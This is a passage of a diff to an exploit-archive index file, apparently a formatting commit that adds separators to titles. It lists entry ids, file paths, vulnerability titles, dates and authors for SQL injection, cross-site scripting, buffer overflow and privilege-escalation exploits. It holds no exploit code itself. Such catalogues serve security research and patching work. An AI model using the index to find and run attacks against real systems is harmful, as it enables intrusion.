Cross-Site Scripting",2005-03-03,benjilenoob,php,webapps,0 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension SQL Injection",2005-03-03,"Fabian Becker",php,webapps,0 25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal",2005-03-03,"Kristof Philipsen",windows,remote,0 25188,platforms/windows/remote/25188.txt,"Opera 7.x/Firefox 1.0/Internet Explorer 6.0 - Information Disclosure Weakness",2005-02-19,upken,windows,remote,0 @@ -22155,7 +22155,7 @@ id,file,description,date,author,platform,type,port 29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.php Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps,0 24999,platforms/windows/remote/24999.py,"Windows Light HTTPD 0.1 - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 -25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer CGenericElement Object Use-After-Free",2013-05-07,Metasploit,windows,remote,0 +25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free",2013-05-07,Metasploit,windows,remote,0 25001,platforms/linux/remote/25001.rb,"GroundWork monarch_scan.cgi OS Command Injection",2013-04-25,Metasploit,linux,remote,0 25002,platforms/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection",2013-04-25,"Joseph Sheridan",php,webapps,0 25003,platforms/php/webapps/25003.txt,"phpMyAdmin 3.5.8 / 4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,php,webapps,0 @@ -22165,7 +22165,7 @@ id,file,description,date,author,platform,type,port 25007,platforms/windows/dos/25007.txt,"Convex 3D 0.8 - Buffer Overflow",2004-12-16,"Ariel Berkman",windows,dos,0 25008,platforms/linux/remote/25008.txt,"LinPopUp 1.2 - Remote Buffer Overflow",2004-12-15,"Stephen Dranger",linux,remote,0 25009,platforms/windows/remote/25009.txt,"Gadu-Gadu 6.0 URL Parser Javascript XSS",2004-12-17,"Jaroslaw Sajko",windows,remote,0 -25010,platforms/linux/remote/25010.txt,"O3Read 0.0.3 HTML Parser Buffer Overflow",2004-12-17,"Wiktor Kopec",linux,remote,0 +25010,platforms/linux/remote/25010.txt,"O3Read 0.0.3 - HTML Parser Buffer Overflow",2004-12-17,"Wiktor Kopec",linux,remote,0 25011,platforms/multiple/remote/25011.txt,"HTML2HDML 1.0.3 - File Conversion Buffer Overflow",2004-12-15,"Matthew Dabrowski",multiple,remote,0 25012,platforms/windows/dos/25012.c,"Easy Software Products LPPassWd 1.1.22 Resource Limit Denial of Service",2004-12-11,"Bartlomiej Sieka",windows,dos,0 25013,platforms/windows/remote/25013.txt,"Interactive Studio GamePort 3.0/3.1/4.0 - Arbitrary application execution",2004-12-17,"amoXi & Dr.vaXin",windows,remote,0 @@ -22173,19 +22173,19 @@ id,file,description,date,author,platform,type,port 25015,platforms/linux/remote/25015.txt,"Michael Kohn Ringtone Tools 2.22 EMelody File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",linux,remote,0 25016,platforms/windows/remote/25016.txt,"ASP2PHP 0.76.23 Preparse Token Variable Buffer Overflow",2004-12-15,"Qiao Zhang",windows,remote,0 25017,platforms/linux/dos/25017.txt,"UML_Utilities User-Mode Linux uml_utilities 20030903 UML_Net Slip Network Interface Denial of Service",2004-12-15,"Danny Lungstrom",linux,dos,0 -25018,platforms/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",multiple,remote,0 +25018,platforms/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",multiple,remote,0 25019,platforms/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",multiple,remote,0 25020,platforms/windows/remote/25020.txt,"Michael Kohn VB2C 0.02 FRM File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",windows,remote,0 -25021,platforms/windows/remote/25021.txt,"ABCPP 1.3 Directive Handler Buffer Overflow",2004-12-15,"Yosef Klein",windows,remote,0 +25021,platforms/windows/remote/25021.txt,"ABCPP 1.3 - Directive Handler Buffer Overflow",2004-12-15,"Yosef Klein",windows,remote,0 25022,platforms/windows/remote/25022.txt,"Jef Moine abcm2ps 3.7.20 ABC File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 25023,platforms/windows/remote/25023.txt,"PGN2WEB 0.3 - Buffer Overflow",2004-12-15,"Tom Palarz",windows,remote,0 25183,platforms/php/webapps/25183.txt,"ProjectBB 0.4.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 25024,platforms/hardware/webapps/25024.txt,"D-Link DIR-635 - Multiple Vulnerabilities",2013-04-26,m-1-k-3,hardware,webapps,0 -25025,platforms/windows/remote/25025.txt,"ABC2PS/JCABC2PS 1.2 Voice Field Buffer Overflow",2004-12-15,"Tom Palarz",windows,remote,0 +25025,platforms/windows/remote/25025.txt,"ABC2PS/JCABC2PS 1.2 - Voice Field Buffer Overflow",2004-12-15,"Tom Palarz",windows,remote,0 25026,platforms/windows/remote/25026.txt,"Mesh Viewer 0.2.2 - Buffer Overflow",2004-12-15,"Mohammed Khan",windows,remote,0 -25027,platforms/windows/remote/25027.txt,"abctab2ps 1.6.3 Write_Heading Function ABC File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 +25027,platforms/windows/remote/25027.txt,"abctab2ps 1.6.3 - Write_Heading Function ABC File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 25028,platforms/multiple/remote/25028.txt,"CSV2XML 0.5.1 - Buffer Overflow",2004-12-15,"Limin Wang",multiple,remote,0 -25029,platforms/windows/remote/25029.txt,"abctab2ps 1.6.3 Trim_Title Function ABC File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 +25029,platforms/windows/remote/25029.txt,"abctab2ps 1.6.3 - Trim_Title Function ABC File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 25030,platforms/linux/remote/25030.txt,"GNU UnRTF 0.19.3 - Font Table Conversion Buffer Overflow",2004-12-15,"Yosef Klein",linux,remote,0 25031,platforms/windows/remote/25031.html,"Windows Media Player 9.0 - ActiveX Control Media File Attribute Corruption Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 25032,platforms/windows/remote/25032.html,"Windows Media Player 9.0 - ActiveX Control File Enumeration Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 @@ -22227,9 +22227,9 @@ id,file,description,date,author,platform,type,port 25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html username Parameter XSS",2005-01-28,ShineShadow,php,webapps,0 25069,platforms/php/webapps/25069.txt,"IceWarp Web Mail 5.3 accountsettings_add.html accountid Parameter XSS",2005-01-28,ShineShadow,php,webapps,0 25070,platforms/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow",2005-01-28,"Florian Westphal",linux,dos,0 -25071,platforms/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 Path Disclosure",2005-01-29,steven@lovebug.org,php,webapps,0 +25071,platforms/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 - Path Disclosure",2005-01-29,steven@lovebug.org,php,webapps,0 25072,platforms/multiple/remote/25072.txt,"CitrusDB 0.1/0.2/0.3 Credit Card Data Remote Information Disclosure",2005-01-31,"Maximillian Dornseif",multiple,remote,0 -25073,platforms/php/webapps/25073.txt,"JShop E-Commerce Suite 1.2 Product.php Cross-Site Scripting",2005-01-31,SmOk3,php,webapps,0 +25073,platforms/php/webapps/25073.txt,"JShop E-Commerce Suite 1.2 - Product.php Cross-Site Scripting",2005-01-31,SmOk3,php,webapps,0 25074,platforms/php/webapps/25074.txt,"xoops incontent module 3.0 - Directory Traversal",2005-01-28,Lostmon,php,webapps,0 25075,platforms/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service",2005-02-01,"Ziv Kamir",multiple,dos,0 25076,platforms/linux/dos/25076.c,"postgresql 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 @@ -22241,9 +22241,9 @@ id,file,description,date,author,platform,type,port 25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer Malformed HTTP POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0 25084,platforms/asp/webapps/25084.txt,"Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection",2005-02-07,"Morning Wood",asp,webapps,0 -25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0 +25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0 25086,platforms/windows/webapps/25086.pl,"Ipswitch IMail 11.01 - XSS",2013-04-29,DaOne,windows,webapps,0 -25087,platforms/php/webapps/25087.txt,"Joomla! 3.0.3 (remember.php) - PHP Object Injection",2013-04-26,EgiX,php,webapps,0 +25087,platforms/php/webapps/25087.txt,"Joomla! 3.0.3 - (remember.php) PHP Object Injection",2013-04-26,EgiX,php,webapps,0 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0 25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload",2005-02-08,"Tan Chew Keong",windows,remote,0 25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 INDEX.php SQL Injection",2005-02-09,Zeelock,php,webapps,0 @@ -22253,7 +22253,7 @@ id,file,description,date,author,platform,type,port 25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 ndex.php language Parameter XSS",2005-02-14,"John Cobb",php,webapps,0 25098,platforms/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - index.php language Parameter Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps,0 25099,platforms/php/webapps/25099.txt,"CitrusDB 0.3.6 importcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 -25100,platforms/php/webapps/25100.txt,"CitrusDB 0.3.6 uploadcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 +25100,platforms/php/webapps/25100.txt,"CitrusDB 0.3.6 - uploadcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25101,platforms/php/webapps/25101.txt,"CitrusDB 0.3.6 importcc.php CSV File SQL Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25102,platforms/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass",2004-02-15,"RedTeam Pentesting",php,webapps,0 25103,platforms/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,php,webapps,0 @@ -22270,7 +22270,7 @@ id,file,description,date,author,platform,type,port 25114,platforms/php/webapps/25114.txt,"paFaq beta4 question.php Multiple Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 25115,platforms/php/webapps/25115.txt,"paFaq beta4 answer.php offset Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 25116,platforms/php/webapps/25116.txt,"paFaq beta4 - search.php search_item Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 -25117,platforms/php/webapps/25117.txt,"paFaq beta4 comment.php Multiple Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 +25117,platforms/php/webapps/25117.txt,"paFaq beta4 - comment.php Multiple Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 25118,platforms/php/webapps/25118.txt,"BibORB 1.3.2 bibindex.php search Parameter XSS",2005-02-17,"Patrick Hof",php,webapps,0 25119,platforms/php/webapps/25119.txt,"BibORB 1.3.2 Add Database Description Parameter XSS",2005-02-17,"Patrick Hof",php,webapps,0 25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - index.php Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps,0 @@ -22393,7 +22393,7 @@ id,file,description,date,author,platform,type,port 25250,platforms/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent XSS",2013-05-06,drone,php,webapps,0 25251,platforms/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps,0 25252,platforms/asp/webapps/25252.txt,"betaparticle blog 2.0/3.0 dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0 -25253,platforms/asp/webapps/25253.txt,"betaparticle blog 2.0/3.0 upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0 +25253,platforms/asp/webapps/25253.txt,"betaparticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0 25254,platforms/asp/webapps/25254.txt,"betaparticle blog 2.0/3.0 myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0 25256,platforms/osx/local/25256.c,"Apple Mac OS X 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 @@ -22407,7 +22407,7 @@ id,file,description,date,author,platform,type,port 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 membres.php mt Parameter XSS",2005-03-23,"benji lemien",php,webapps,0 25265,platforms/php/webapps/25265.txt,"phpSysInfo 2.0/2.3 - index.php sensor_program Parameter XSS",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 25266,platforms/php/webapps/25266.txt,"phpSysInfo 2.0/2.3 system_footer.php Multiple Parameter XSS",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 -25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 HTML Injection",2005-03-23,"Woody Hughes",php,webapps,0 +25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 - HTML Injection",2005-03-23,"Woody Hughes",php,webapps,0 25268,platforms/windows/dos/25268.txt,"Microsoft Windows XP - TSShutdn.exe Remote Denial of Service",2005-03-23,"Juha-Matti Laurio",windows,dos,0 25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0 25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 Calendar_Scheduler.php Cross-Site Scripting",2004-03-24,"Alberto Trivero",php,webapps,0 @@ -22418,7 +22418,7 @@ id,file,description,date,author,platform,type,port 25275,platforms/linux/remote/25275.c,"Smail-3 - Multiple Remote and Local Vulnerabilities",2005-03-25,infamous42md,linux,remote,0 25276,platforms/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 Review.php Multiple Parameter Cross-Site Scripting",2005-03-25,mircia,php,webapps,0 25277,platforms/hardware/dos/25277.txt,"Netcomm NB1300 Modem/Router Remote Denial of Service",2005-03-25,"Chris Rock",hardware,dos,0 -25278,platforms/php/webapps/25278.sh,"ESMI PayPal Storefront 1.7 pages.php idpages Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 +25278,platforms/php/webapps/25278.sh,"ESMI PayPal Storefront 1.7 - pages.php idpages Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 25279,platforms/php/webapps/25279.txt,"ESMI PayPal Storefront 1.7 products1.php id2 Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 25280,platforms/php/webapps/25280.txt,"ESMI PayPal Storefront 1.7 - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 25281,platforms/windows/dos/25281.py,"Apple QuickTime 6.5.1 PictureViewer Buffer Overflow",2005-03-26,liquid@cyberspace.org,windows,dos,0 @@ -22441,18 +22441,18 @@ id,file,description,date,author,platform,type,port 25300,platforms/php/webapps/25300.txt,"EXoops Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25301,platforms/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25302,platforms/php/webapps/25302.txt,"phpCOIN 1.2 auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 -25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client Env_opt_add Heap-Based Buffer Overflow",2005-03-28,"Gael Delalleau",linux,dos,0 +25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap-Based Buffer Overflow",2005-03-28,"Gael Delalleau",linux,dos,0 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure Exploit",2013-05-08,HTP,multiple,webapps,0 -33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 Administration Interface admin/phpshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Administration Interface admin/phpshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 showgallery.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0 25309,platforms/php/webapps/25309.txt,"PhotoPost Pro 5.1 showmembers.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0 25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 slideshow.php photo Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0 25311,platforms/php/webapps/25311.txt,"PhotoPost Pro 5.1 showmembers.php sl Parameter SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 25312,platforms/php/webapps/25312.txt,"PhotoPost Pro 5.1 showphoto.php photo Parameter SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 -25313,platforms/asp/webapps/25313.txt,"ACS Blog 0.8/0.9/1.0/1.1 Name Field HTML Injection",2005-03-28,"Dan Crowley",asp,webapps,0 +25313,platforms/asp/webapps/25313.txt,"ACS Blog 0.8/0.9/1.0/1.1 - Name Field HTML Injection",2005-03-28,"Dan Crowley",asp,webapps,0 25314,platforms/php/webapps/25314.txt,"The Includer 1.0/1.1 - Remote File Inclusion",2005-03-29,"hoang yen",php,webapps,0 25315,platforms/php/webapps/25315.html,"Chatness 2.5 Message Form Field HTML Injection",2005-03-29,3nitro,php,webapps,0 25316,platforms/php/webapps/25316.txt,"CPG Dragonfly 9.0.2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-29,mircia,php,webapps,0 @@ -22465,7 +22465,7 @@ id,file,description,date,author,platform,type,port 25323,platforms/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,php,webapps,0 25324,platforms/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps,0 25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 Object Push Service Bluetooth File Upload Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 -25326,platforms/windows/dos/25326.txt,"RUMBA 7.3/7.4 Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos,0 +25326,platforms/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos,0 25327,platforms/php/webapps/25327.txt,"AlstraSoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,php,webapps,0 25328,platforms/php/webapps/25328.txt,"AlstraSoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0 25329,platforms/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow",2005-04-02,"Luigi Auriemma",windows,dos,0 @@ -22486,12 +22486,12 @@ id,file,description,date,author,platform,type,port 25344,platforms/php/webapps/25344.txt,"PHPBB 2.0.13 DLMan Pro Module SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 25345,platforms/php/webapps/25345.txt,"PHPBB 2.0.13 Linkz Pro Module SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 25346,platforms/asp/webapps/25346.txt,"Active Auction House - Default.ASP Multiple SQL Injection",2005-04-06,Dcrab,asp,webapps,0 -25347,platforms/asp/webapps/25347.txt,"Active Auction House ItemInfo.ASP SQL Injection",2005-04-06,Dcrab,asp,webapps,0 -25348,platforms/asp/webapps/25348.txt,"Active Auction House start.asp ReturnURL Parameter XSS",2005-04-06,Dcrab,asp,webapps,0 -25349,platforms/asp/webapps/25349.txt,"Active Auction House account.asp ReturnURL Parameter XSS",2005-04-06,Dcrab,asp,webapps,0 +25347,platforms/asp/webapps/25347.txt,"Active Auction House - ItemInfo.ASP SQL Injection",2005-04-06,Dcrab,asp,webapps,0 +25348,platforms/asp/webapps/25348.txt,"Active Auction House - start.asp ReturnURL Parameter XSS",2005-04-06,Dcrab,asp,webapps,0 +25349,platforms/asp/webapps/25349.txt,"Active Auction House - account.asp ReturnURL Parameter XSS",2005-04-06,Dcrab,asp,webapps,0 25350,platforms/cgi/webapps/25350.txt,"WebWasher CSM 4.4.1 Build 752 Conf Script Cross-Site Scripting",2005-04-06,"Oliver Karow",cgi,webapps,0 -25351,platforms/asp/webapps/25351.txt,"Active Auction House Sendpassword.ASP Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,Dcrab,asp,webapps,0 -25352,platforms/asp/webapps/25352.txt,"Active Auction House WatchThisItem.ASP Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 +25351,platforms/asp/webapps/25351.txt,"Active Auction House - Sendpassword.ASP Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,Dcrab,asp,webapps,0 +25352,platforms/asp/webapps/25352.txt,"Active Auction House - WatchThisItem.ASP Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25353,platforms/unix/dos/25353.txt,"IBM Lotus Domino Server 6.5.1 Web Service Remote Denial of Service",2005-04-06,anonymous,unix,dos,0 25354,platforms/php/webapps/25354.txt,"Ocean12 Membership Manager Pro Cross-Site Scripting",2005-04-06,Zinho,php,webapps,0 25355,platforms/php/webapps/25355.txt,"CubeCart 2.0.x - index.php Multiple Variable Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 @@ -22514,21 +22514,21 @@ id,file,description,date,author,platform,type,port 25372,platforms/php/webapps/25372.txt,"RadScripts RadBids Gold 2.0 - index.php Multiple Parameter XSS",2005-04-09,Dcrab,php,webapps,0 25373,platforms/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - view.php id Parameter XSS",2005-04-09,kre0n,php,webapps,0 25374,platforms/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - view.php id Parameter SQL Injection",2005-04-09,kre0n,php,webapps,0 -25375,platforms/linux/remote/25375.pl,"KDE KMail 1.7.1 HTML EMail Remote Email Content Spoofing",2005-04-11,"Noam Rathaus",linux,remote,0 -25376,platforms/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 News.php File Include",2005-04-10,"James Bercegay",php,webapps,0 +25375,platforms/linux/remote/25375.pl,"KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing",2005-04-11,"Noam Rathaus",linux,remote,0 +25376,platforms/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 - News.php File Include",2005-04-10,"James Bercegay",php,webapps,0 25377,platforms/php/webapps/25377.txt,"ModernGigabyte ModernBill 4.3 C_CODE Parameter Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps,0 25378,platforms/php/webapps/25378.txt,"ModernGigabyte ModernBill 4.3 Aid Parameter Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps,0 25379,platforms/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 - Index.php SQL Injection",2005-04-11,"Andreas Constantinides",php,webapps,0 25380,platforms/php/webapps/25380.txt,"Invision Power Board 1.x - ST Parameter SQL Injection",2005-04-11,Dcrab,php,webapps,0 -25381,platforms/php/webapps/25381.txt,"WebCT Discussion Board 4.1 HTML Injection",2005-04-11,lacertosum,php,webapps,0 +25381,platforms/php/webapps/25381.txt,"WebCT Discussion Board 4.1 - HTML Injection",2005-04-11,lacertosum,php,webapps,0 25382,platforms/php/webapps/25382.txt,"JPortal 2.3.1 Banner.php SQL Injection",2005-04-11,CiNU5,php,webapps,0 25383,platforms/windows/dos/25383.pl,"Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution (1)",2005-04-12,"Song Liu",windows,dos,0 25384,platforms/windows/remote/25384.c,"Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution (2)",2005-04-16,"Yuri Gushin",windows,remote,0 25385,platforms/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 Content Advisor File Handling Buffer Overflow",2005-04-12,"Miguel Tarasc",windows,remote,0 25386,platforms/windows/remote/25386.txt,"Microsoft Internet Explorer 5.0.1 DHTML Object Race Condition Memory Corruption",2005-04-12,"Berend-Jan Wever",windows,remote,0 -25387,platforms/multiple/dos/25387.txt,"Multiple Vendor ICMP Implementation Spoofed Source Quench Packet DoS",2005-04-12,"Fernando Gont",multiple,dos,0 -25388,platforms/multiple/dos/25388.txt,"Multiple Vendor ICMP Implementation Malformed Path MTU DoS",2005-04-12,"Fernando Gont",multiple,dos,0 -25389,platforms/multiple/dos/25389.txt,"Multiple Vendor ICMP Message Handling DoS",2005-04-12,"Fernando Gont",multiple,dos,0 +25387,platforms/multiple/dos/25387.txt,"Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet DoS",2005-04-12,"Fernando Gont",multiple,dos,0 +25388,platforms/multiple/dos/25388.txt,"Multiple Vendor ICMP Implementation - Malformed Path MTU DoS",2005-04-12,"Fernando Gont",multiple,dos,0 +25389,platforms/multiple/dos/25389.txt,"Multiple Vendor ICMP Message Handling - DoS",2005-04-12,"Fernando Gont",multiple,dos,0 25390,platforms/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 Comersus_Search_Item.ASP Cross-Site Scripting",2005-04-12,Lostmon,asp,webapps,0 25391,platforms/multiple/remote/25391.txt,"XAMPP Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote,0 @@ -22548,7 +22548,7 @@ id,file,description,date,author,platform,type,port 25406,platforms/linux/local/25406.sh,"Kloxo 6.1.6 - Local Privilege Escalation",2013-05-13,HTP,linux,local,0 25408,platforms/windows/dos/25408.pl,"Windows Media Player 11.0.0 - (.wav) Crash PoC",2013-05-13,Asesino04,windows,dos,0 25409,platforms/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilties",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 -25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster (index.php id param) - SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 +25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster - (index.php id param) SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 25411,platforms/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",linux,local,0 25412,platforms/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 25413,platforms/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 @@ -22564,7 +22564,7 @@ id,file,description,date,author,platform,type,port 25423,platforms/php/webapps/25423.txt,"SPHPBlog 0.4 - Search.php Cross-Site Scripting",2005-04-14,y3dips,php,webapps,0 25424,platforms/asp/webapps/25424.txt,"OneWorldStore OWAddItem.ASP SQL Injection",2005-04-14,Dcrab,asp,webapps,0 